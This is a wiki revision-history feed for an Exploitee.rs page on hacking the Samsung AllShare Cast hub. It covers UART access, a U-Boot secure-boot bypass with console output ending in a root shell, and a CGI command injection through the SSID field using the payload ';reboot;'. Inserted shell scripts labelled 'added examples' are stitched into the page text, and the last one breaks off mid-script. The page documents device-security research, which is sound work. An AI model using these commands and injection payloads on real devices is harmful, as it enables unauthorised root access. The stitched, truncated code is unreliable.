https://www.Exploitee.rs/index.php?title=Samsung_Allshare_Cast&feed=atom&action=history
Samsung Allshare Cast - Revision history
2024-03-28T16:52:36Z
Revision history for this page on the wiki
MediaWiki 1.37.2
https://www.Exploitee.rs/index.php?title=Samsung_Allshare_Cast&diff=2780&oldid=prev
Zenofex at 13:06, 5 August 2017
2017-08-05T13:06:30Z
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="en">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 13:06, 5 August 2017</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l11">Line 11:</td>
<td colspan="2" class="diff-lineno">Line 11:</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>[http://www.samsung.com/us/mobile/cell-phones-accessories/EAD-T10JDEGSTA-compatible compatible-devices]</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>[http://www.samsung.com/us/mobile/cell-phones-accessories/EAD-T10JDEGSTA-compatible compatible-devices]</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">== Purchase ==</ins></div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.</ins></div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">[https://www.amazon.com/Samsung-All-Share-Wireless-Display-Adapter/dp/B0089VO7MY/ref=as_li_ss_tl?ie=UTF8&qid=1501938334&sr=8-2&keywords=Allshare+Cast&linkCode=ll1&tag=exploiteers-20&linkId=8be97bb1074d95e346270007ac0e3bf5 Purchase the Allshare Cast at Amazon]</ins></div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>==GPL==</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>==GPL==</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>You can find the GPL code for this device [http://openpre.samsung.com/reception/receptionSub.do?method=sub&sub=F&searchValue=EAD-T10: here].</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>You can find the GPL code for this device [http://openpre.samsung.com/reception/receptionSub.do?method=sub&sub=F&searchValue=EAD-T10: here].</div></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del style="font-weight: bold; text-decoration: none;"></del></div></td><td colspan="2" class="diff-side-added"></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>==Teardown==</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>==Teardown==</div></td></tr>
</table>
Zenofex
https://www.Exploitee.rs/index.php?title=Samsung_Allshare_Cast&diff=2670&oldid=prev
Zenofex at 07:05, 29 January 2017
2017-01-29T07:05:29Z
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="en">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 07:05, 29 January 2017</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l1">Line 1:</td>
<td colspan="2" class="diff-lineno">Line 1:</td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">__FORCETOC__</ins></div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">{{Disclaimer}}</ins></div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>[[File:Allsharecast.jpg|thumb|320px]]</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>[[File:Allsharecast.jpg|thumb|320px]]</div></td></tr>
<tr><td colspan="2" class="diff-side-deleted"></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">[[Category:Samsung Allshare Cast]]</ins></div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>=Samsung Allshare Cast Hub=</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>=Samsung Allshare Cast Hub=</div></td></tr>
</table>
Zenofex
https://www.Exploitee.rs/index.php?title=Samsung_Allshare_Cast&diff=2668&oldid=prev
Zenofex: Zenofex moved page Samsung allshare cast hub to Samsung Allshare Cast
2017-01-29T07:01:12Z
<p>Zenofex moved page <a href="/index.php/Samsung_allshare_cast_hub" class="mw-redirect" title="Samsung allshare cast hub">Samsung allshare cast hub</a> to <a href="/index.php/Samsung_Allshare_Cast" title="Samsung Allshare Cast">Samsung Allshare Cast</a></p>
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="en">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 07:01, 29 January 2017</td>
</tr>
</table>
Zenofex
https://www.Exploitee.rs/index.php?title=Samsung_Allshare_Cast&diff=2667&oldid=prev
0x00string at 07:00, 29 January 2017
2017-01-29T07:00:17Z
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="en">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 07:00, 29 January 2017</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l1">Line 1:</td>
<td colspan="2" class="diff-lineno">Line 1:</td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>[[File:Allsharecast.jpg|320px]]</div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>[[File:Allsharecast.jpg<ins style="font-weight: bold; text-decoration: none;">|thumb</ins>|320px]]</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>=Samsung Allshare Cast Hub=</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>=Samsung Allshare Cast Hub=</div></td></tr>
</table>
0x00string
https://www.Exploitee.rs/index.php?title=Samsung_Allshare_Cast&diff=2666&oldid=prev
0x00string at 06:58, 29 January 2017
2017-01-29T06:58:55Z
<table style="background-color: #fff; color: #202122;" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="en">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 06:58, 29 January 2017</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l268">Line 268:</td>
<td colspan="2" class="diff-lineno">Line 268:</td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>===PoC===</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>===PoC===</div></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del style="font-weight: bold; text-decoration: none;"><iframe width="560" height="315" src="</del>https://www.youtube.com/embed/7fCZu7DEAX8<del style="font-weight: bold; text-decoration: none;">" frameborder="0" allowfullscreen></iframe></del></div></td><td class="diff-marker" data-marker="+"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;">[</ins>https://www.youtube.com/embed/7fCZu7DEAX8 <ins style="font-weight: bold; text-decoration: none;">PoC Demo]</ins></div></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div> </div></td><td colspan="2" class="diff-side-added"></td></tr>
<tr><td class="diff-marker" data-marker="−"></td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div> </div></td><td colspan="2" class="diff-side-added"></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><br/></td></tr>
<tr><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>The following PoC will automatically scan IPs to locate the AllShare Cast, exploit the CGI command injection to get a telnet shell, restart screen mirroring and automate a telnet session to gain persistent root.</div></td><td class="diff-marker"></td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>The following PoC will automatically scan IPs to locate the AllShare Cast, exploit the CGI command injection to get a telnet shell, restart screen mirroring and automate a telnet session to gain persistent root.</div></td></tr>
</table>
0x00string
https://www.Exploitee.rs/index.php?title=Samsung_Allshare_Cast&diff=2665&oldid=prev
0x00string: Created page with "320px =Samsung Allshare Cast Hub= The AllShare Cast Hub (EAD-T10JDEGSTA) is a device for streaming video from a mobile device to an HDMI display...."
2017-01-29T06:58:02Z
<p><b>New page</b></p><div>[[File:Allsharecast.jpg|320px]]<br />
<br />
=Samsung Allshare Cast Hub=<br />
<br />
The AllShare Cast Hub (EAD-T10JDEGSTA) is a device for streaming video from a mobile device to an HDMI display.<br />
<br />
[http://www.amazon.com/Samsung-All-Share-Wireless-Display-Adapter/dp/B0089VO7MY/ Amazon]<br />
[http://www.samsung.com/us/mobile/cell-phones-accessories/EAD-T10JDEGSTA-compatible compatible-devices]<br />
<br />
<br />
==GPL==<br />
<br />
You can find the GPL code for this device [http://openpre.samsung.com/reception/receptionSub.do?method=sub&sub=F&searchValue=EAD-T10: here].<br />
<br />
<br />
==Teardown==<br />
===Disassembly===<br />
[[File:Ascuart.jpg|320px]]<br />
[[File:Asctop.jpg|320px]]<br />
[[File:Ascbottom.JPG|320px]]<br />
[[File:Ascnoshield.JPG|320px]]<br />
<br />
<br />
<br />
===UART===<br />
Connect your UART adapter to the highlighted pads and set your adapter's baud rate to 115200.<br />
<br />
<br />
<br />
====Bypass autoboot====<br />
<br />
After connecting to the UART, autoboot can be bypassed by pressing any key during the boot delay. Button mashing will work.<br />
<br />
Interrupting U-Boot allows us to review and change environment variables such as bootdelay, bootcmd or bootargs.<br />
<br />
Changing the bootdelay variable (and saving the environment with saveenv) makes bypassing autoboot easier on subsequent boots.<br />
<br />
<br />
<pre><br />
>setenv bootdelay 5<br />
<br />
>saveenv<br />
</pre><br />
<br />
==Secure Boot Bypass==<br />
===Reversing boots===<br />
After a quick look at environment variables, you'll find that bootcmd is set to call <b>boots</b>.<br />
<pre><br />
bootcmd=run ${INTFPRG}; boots<br />
</pre><br />
<br />
<br />
Hijacking init by changing the bootargs environment variable will not work here, because <b>boots</b> verifies bootargs before proceeding. Pointing bootcmd at the flash contents directly will not work either: <b>boots</b> loads two encrypted blobs from NAND into RAM, decrypts them, and only then boots from them, so nothing in NAND is bootable as-is.<br />
<br />
We can use <b>bootm</b> instead, which does not check bootargs and will boot a kernel from a given RAM address. Before that can work, the kernel must be decrypted. The <b>cryptotest</b> command, present in this U-Boot build and in the GPL source release, decrypts a buffer that is already in RAM. <b>cryptotest</b>, <b>nand</b> and <b>bootm</b> together are enough to bypass secure boot on this device.<br />
<br />
<br />
Let's take a look at the inputs required by <b>nand read</b> and <b>cryptotest</b>.<br />
<br />
*<b>nand read</b> takes two arguments, in this order:<br />
<br />
** a RAM destination address<br />
<br />
** a NAND source offset<br />
<br />
*** optionally, a third argument, the length in bytes, can be provided; without it this U-Boot build reads a default size (0x2000000 in the console log below)<br />
<br />
<br />
*<b>cryptotest</b> takes three arguments:<br />
<br />
** the RAM source address of the encrypted data<br />
<br />
** the RAM destination address for the decrypted output<br />
<br />
** the size of the data to be decrypted<br />
<br />
<br />
<br />
Based on the information found in the GPL code and the arguments <b>nand</b> and <b>cryptotest</b> take, we can decrypt and boot the kernel with the following commands:<br />
<br />
*<b>nand read 06020000 2400000</b> ''06020000 RAM destination address, 2400000 NAND source offset (size defaults to 0x2000000)''<br />
<br />
<br />
*<b>cryptotest 06020000 08080000 2000000</b> ''06020000 RAM source address, 08080000 RAM destination address, and 2000000 size''<br />
<br />
<br />
*<b>nand read 8000000 5801000 20000</b> ''8000000 RAM destination address, 5801000 NAND source offset, and 20000 size''<br />
<br />
<br />
*<b>cryptotest 8000000 bfff000 20000</b> ''8000000 RAM source address, bfff000 RAM destination address, and 20000 size''<br />
<hr><br />
<br />
<br />
<br />
<br />
===Using bootm and cryptotest to bypass secure-boot===<br />
<pre><br />
U-Boot 2011.06-svn11394 (Aug 09 2012 - 10:40:00)<br />
[...]<br />
Hit any key to stop autoboot: 0<br />
[...]<br />
CNCl800L>nand read 06020000 2400000<br />
NAND read: device 0 offset 0x2400000, size 0x2000000<br />
Skipping bad block 0x03a60000<br />
Skipping bad block 0x042c0000<br />
33554432 bytes read: OK<br />
[...]<br />
CNCl800L> cryptotest 06020000 08080000 2000000<br />
length 33554432: 511 whole chunks with 65536 remainder<br />
done!<br />
[...]<br />
CNCl800L>nand read 8000000 5801000 20000<br />
NAND read: device 0 offset 0x5801000, size 0x20000<br />
131072 bytes read: OK<br />
[...]<br />
CNCl800L> cryptotest 8000000 bfff000 20000<br />
length 131072: 1 whole chunks with 65536 remainder<br />
done!<br />
[...]<br />
setenv bootargs ${bootargs} init=/bin/sh<br />
[...]<br />
CNCl800L>bootm 08080000<br />
Starting kernel ...<br />
<br />
Uncompressing Linux..........................................................................<br />
..................................................................... done, booting the kernel.<br />
Linux version 2.6.32.45-SDK-0.7 (builder@qabuild2) (gcc version 4.4.1<br />
(Sourcery G++ Lite 2010q1-202) ) #1 PREEMPT Sun Nov 25 10:56:43 PST 2012<br />
CPU: ARMv6-compatible processor [410fb767] revision 7 (ARMv7), cr=00c5387f<br />
CPU: VIPT aliasing data cache, VIPT aliasing instruction cache<br />
Machine: Celestial CNC1800L<br />
[...]<br />
ATH-80:57:19:85:F2:28:/root # id<br />
uid=0(root) gid=0(root) groups=0(root),10(wheel)<br />
</pre><br />
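The addresses above are easy to mistype at a serial console, and the order of the four commands matters: the second <b>nand read</b> lands at 8000000, inside the region the encrypted kernel occupied (06020000 to 08020000), which is only safe because the kernel has already been decrypted out to 08080000. The script below is an added example, not tooling from this page or from Exploitee.rs: it checks the RAM layout for that kind of clobbering and then prints the exact console lines, with the size given explicitly on every read. The addresses are the ones from this page; the overlap rules are our own assumption about what is safe to reuse.<br />

```shell
#!/bin/sh
# Added example, not code from the Exploitee.rs page: sanity-check the RAM
# layout of the nand read / cryptotest sequence before typing it over UART,
# then print the exact U-Boot console lines. Addresses are the page's; the
# overlap rules below are our own assumption about what is safe to reuse.

# One decrypt step per line: NAME NAND_OFFSET SIZE ENC_RAM DEC_RAM
# (hex without 0x, spelled the way the U-Boot console wants it).
PAGE_STEPS='kernel 2400000 2000000 06020000 08080000
blob2 5801000 20000 8000000 bfff000'

# Where the decrypted kernel ends up, i.e. the argument for bootm.
BOOTM_ADDR=08080000

# range_overlap A ALEN B BLEN: succeed when [A, A+ALEN) and [B, B+BLEN) intersect.
range_overlap() {
    a=$((0x$1)); aend=$((a + 0x$2))
    b=$((0x$3)); bend=$((b + 0x$4))
    [ "$a" -lt "$bend" ] && [ "$b" -lt "$aend" ]
}

# check_layout STEPS: fail if a step would decrypt onto its own ciphertext,
# or if its ciphertext load or plaintext output would overwrite the plaintext
# of an earlier step. Earlier ciphertext buffers are already consumed, so
# reusing them (as the page does for the second blob) is allowed.
check_layout() {
    seen=""                                  # name:dec:size of finished steps
    while read -r name off size enc dec; do
        [ -z "$name" ] && continue
        if range_overlap "$enc" "$size" "$dec" "$size"; then
            echo "layout error: $name decrypts onto its own ciphertext" >&2
            return 1
        fi
        for prev in $seen; do
            pname=${prev%%:*}
            rest=${prev#*:}
            pdec=${rest%%:*}
            psize=${rest#*:}
            if range_overlap "$enc" "$size" "$pdec" "$psize"; then
                echo "layout error: loading $name clobbers decrypted $pname" >&2
                return 1
            fi
            if range_overlap "$dec" "$size" "$pdec" "$psize"; then
                echo "layout error: output of $name clobbers decrypted $pname" >&2
                return 1
            fi
        done
        seen="$seen $name:$dec:$size"
    done <<EOF
$1
EOF
    return 0
}

# print_commands STEPS: emit the console lines. Every nand read gets an
# explicit size; the page omits it on the first read and relies on the
# vendor U-Boot's default (0x2000000 in the log above).
print_commands() {
    while read -r name off size enc dec; do
        [ -z "$name" ] && continue
        echo "nand read $enc $off $size"
        echo "cryptotest $enc $dec $size"
    done <<EOF
$1
EOF
    echo 'setenv bootargs ${bootargs} init=/bin/sh'
    echo "bootm $BOOTM_ADDR"
}

if check_layout "$PAGE_STEPS"; then
    print_commands "$PAGE_STEPS"
fi
```

Run it on a workstation and paste the printed lines into the U-Boot prompt one at a time, checking for the "bytes read: OK" and "done!" responses shown in the log above before sending the next one. Moving the second blob's load address a little higher (say to 08090000) makes check_layout refuse the layout, because that load would overwrite the decrypted kernel.<br />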
<br />
<br />
==CGI Command Injection==<br />
The AllShare Cast runs a web interface on TCP port 80 which hosts CGI scripts that are vulnerable to command injection.<br />
<br />
This can be exploited from a phone, or from any device that can establish a Wi-Fi Display (WFD) connection with the AllShare Cast (Wi-Fi Direct P2P with WPS push-button pairing).<br />
<br />
<br />
<br />
===Setup===<br />
<i>You will need</i><br />
* A device capable of establishing a connection with the AllShare Cast<br />
<br />
** (Tested on a rooted Samsung Galaxy S 3)<br />
<br />
* A [http://cache.saurik.com/android/armel/busybox busybox] binary (greets, saurik!)<br />
<br />
* Curl, or a browser<br />
<br />
<br />
===Connect to the device===<br />
Use adb to push your busybox binary to /data/local/tmp/<br />
<br />
*e.g., <b>./adb push busybox /data/local/tmp/</b>.<br />
<br />
On your phone, pull down the drop down menu and start screen mirroring.<br />
<br />
Once connected, the AllShare Cast will have an IP address in the range 192.168.49.100 to 192.168.49.254.<br />
<br />
Use ping or curl to determine the device's IP.<br />
<br />
*This can be automated, given a file 100-254.txt with one last octet per line: <b>$ while read l; do echo $l; curl 192.168.49.$l; done < 100-254.txt</b><br />
<br />
<br />
<br />
===Exploiting Web CGI===<br />
[[File:Ascwebinterface.png|thumb|320px|This device runs httpd on TCP port 80.]]<br />
<br />
<br />
This form submits its fields to a CGI script which does not sanitize the user-supplied input before using it on a shell command line.<br />
<br />
<u>/cavium/www/index.html | line 80</u><br />
<br />
<pre><br />
[...]<br />
<form action="/cgi-bin/configure-external-ap.sh" enctype="multipart/form-data" method="post"><br />
<input type=text size=40 name=UEnvEXT_AP_SSID value="" /><br />
<select name=UEnvEXT_AP_SECURITY><br />
<option value="NONE" selected=selected>None (OPEN, no authentication)</option><br />
<option value="WEP">WEP</option><br />
<option value="WPAWPA2PSK">WPA/WPA2 PSK</option><br />
<option value="WPAWPA2EAP" disabled>WPA/WPA2 802.1x EAP (not supported)</option><br />
</select><br />
<input type=password size=40 name=UEnvEXT_AP_KEY value="" /><br />
<input type="submit" name="UEnvEXT_AP_ACTION" value="Save This External AP"><br />
<input type="submit" name="UEnvEXT_AP_ACTION" value="Connect to This External AP now"><br />
</form><br />
[...]<br />
</pre><br />
<br />
This input is used by a script located at /cavium/www/cgi-bin/configure-external-ap.sh<br />
<br />
<u>configure-external-ap.sh | line 53</u><br />
<pre><br />
[...]<br />
if wificmd $NEW_EXT_AP_ACTION SSID=\"$NEW_EXT_AP_SSID\" SECTYPE=NONE<br />
then<br />
RESULT="OK"<br />
else<br />
RESULT="Could not setup OPEN mode AP \"$NEW_EXT_AP_SSID\"."<br />
[...]<br />
</pre><br />
<br />
By populating the <b>UEnvEXT_AP_SSID</b> parameter with <b>";reboot;"</b> and submitting the form with the "Save This External AP" button, the device will reboot: the leading quote closes the quoted SSID, the semicolon ends the wificmd command, and reboot runs as a second command.<br />
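To make the bug and its fix concrete, here is an added example, not the device's script: a stand-in for the vulnerable SSID handling beside a hardened version, runnable on a workstation. <b>wificmd</b> and <b>reboot</b> are replaced with shell functions that only record what they were asked to do. The page shows a single line of configure-external-ap.sh, so the point at which the SSID reaches a second shell parse is not visible; the stand-in models it with <b>eval</b>, which is an assumption, chosen because it reproduces exactly the behaviour the page demonstrates with <b>";reboot;"</b>.<br />

```shell
#!/bin/sh
# Added example, not the device's code. Stand-in for the SSID handling in
# configure-external-ap.sh (vulnerable) next to a hardened version.
# wificmd and reboot are fake here and only append to LOG; the use of eval to
# model how the SSID gets re-parsed by a shell is an assumption, since the
# page shows only one line of the real script.

LOG=""
wificmd() { LOG="$LOG|wificmd:$*"; }
reboot()  { LOG="$LOG|REBOOT"; }

# Vulnerable: the command line is built as a string with the raw SSID inside
# quotes and then parsed by the shell again, so a quote and a ';' in the SSID
# end the argument and start a new command.
configure_ap_vulnerable() {
    NEW_EXT_AP_SSID=$1
    LOG=""
    # the fragment left after an injected command may not parse; ignore it,
    # as the commands before it have already run
    eval "wificmd Save SSID=\"$NEW_EXT_AP_SSID\" SECTYPE=NONE" 2>/dev/null || :
    printf '%s\n' "$LOG"
}

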